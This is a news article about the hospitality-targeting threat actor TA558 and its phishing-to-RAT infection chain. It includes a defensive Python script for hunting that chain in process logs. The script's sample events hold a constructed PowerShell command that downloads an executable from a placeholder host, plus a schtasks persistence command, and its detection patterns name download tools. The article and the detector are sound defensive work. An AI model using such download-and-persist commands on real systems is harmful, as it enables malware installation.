Hotels and Travel Companies Targeted by Threat Actor TA558
This year, a threat actor tracked as TA558 has stepped up its activity, launching phishing campaigns against numerous hotels and other businesses in the hospitality and travel industries.
The group gains access to target systems, performs reconnaissance, steals sensitive data, and ultimately diverts money from the victims' customers, using 15 different malware families, most of them remote access trojans (RATs). Proofpoint has observed a rise in TA558 activity recently, which may be tied to the tourism industry's recovery after two years of COVID-19 restrictions. TA558 has been active since at least 2018.
Latest Campaigns by TA558
By 2022, TA558 had abandoned macro-laden documents in its phishing emails in favor of RAR and ISO file attachments or embedded URLs. Other threat actors have made the same shift in response to Microsoft's decision to disable VBA and XL4 macros in Office, a feature attackers had long abused to deliver, drop, and install malware through weaponized documents. The phishing emails that start the infection chain are written in English, Spanish, and Portuguese and are sent to businesses in North America, Western Europe, and Latin America.
The emails concern reservations with the target company and pose as correspondence from conference planners, travel agencies, and other senders that are hard to ignore. The URL in the message body, presented as a link for making a reservation, delivers an ISO file to anyone who clicks it. A batch file inside the image launches a PowerShell script that downloads the RAT payload to the victim's machine and creates a scheduled task for persistence.
After infecting hotel systems with the RAT, TA558 moves further into the network to steal customer data and stored credit card details, and to modify guest-facing websites so that reservation payments are redirected.
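The delivery chain just described (batch file, then PowerShell download, then scheduled task) can be hunted for in process-creation telemetry. The following Python is an added example, not code from Proofpoint's report or this article; it walks constructed records in the shape of Sysmon Event ID 1 fields (pid, ppid, image, cmdline) and reports parent-child chains that match all three stages. The sample events, paths and URL are constructed, and the download and task cues are assumed heuristics.

```python
"""Find cmd.exe(.bat) -> powershell.exe(download) -> schtasks /create chains.

Events are constructed samples shaped like Sysmon Event ID 1 fields; they are
not real TA558 telemetry. Cue patterns below are assumed heuristics."""
import re
from collections import defaultdict

DOWNLOAD_CUES = re.compile(
    r"invoke-webrequest|downloadstring|downloadfile|start-bitstransfer"
    r"|\biwr\b|\bcurl\b|\bwget\b", re.I)
TASK_CUES = re.compile(r"schtasks(\.exe)?\s+.*?/create|register-scheduledtask", re.I)
BATCH_CUE = re.compile(r"\.(bat|cmd)\b", re.I)

SAMPLE_EVENTS = [  # constructed; E:\ stands in for a mounted ISO volume
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "E:\Reservation_details.bat"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/p -OutFile $env:TEMP\\u.exe"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "%TEMP%\\u.exe"'},
    # benign admin chain: a batch file calls PowerShell, but nothing is downloaded
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c backup.bat"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\ops\\rotate.ps1"},
]

def _name(image):
    """Basename of an image path, lower-cased for comparison."""
    return image.rsplit("\\", 1)[-1].lower()

def find_iso_delivery_chains(events):
    """Return (batch_event, powershell_event, task_event) for every full chain."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    hits = []
    for cmd in events:
        # stage 1: cmd.exe executing a .bat/.cmd file
        if _name(cmd["image"]) != "cmd.exe" or not BATCH_CUE.search(cmd["cmdline"]):
            continue
        for ps in children[cmd["pid"]]:
            # stage 2: child PowerShell whose command line fetches something
            if _name(ps["image"]) not in ("powershell.exe", "pwsh.exe") \
                    or not DOWNLOAD_CUES.search(ps["cmdline"]):
                continue
            # stage 3: persistence, either inline in the PowerShell command or via a child schtasks.exe
            if TASK_CUES.search(ps["cmdline"]):
                hits.append((cmd, ps, ps))
                continue
            for task in children[ps["pid"]]:
                if TASK_CUES.search(task["cmdline"]):
                    hits.append((cmd, ps, task))
    return hits

if __name__ == "__main__":
    for bat, ps, task in find_iso_delivery_chains(SAMPLE_EVENTS):
        print(f"chain: pid {bat['pid']} -> {ps['pid']} -> {task['pid']}")
```

Only the full three-stage chain is reported, so the benign backup batch file that merely runs a local PowerShell script is left alone.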
The Marino Boutique Hotel in Lisbon, Portugal, had its Booking.com account hacked in July 2022. The hacker stole €500,000 from unwary customers who had paid to book a room over the course of four days.
Although TA558's involvement in that incident was not established, it matches the threat actor's TTPs and targeting, and at the very least illustrates how the group could monetize its access to hotel systems.
Other ways TA558 could profit include selling or using the stolen credit card data, selling customer PII, extorting wealthy guests, or providing ransomware groups with access to the hotel's network.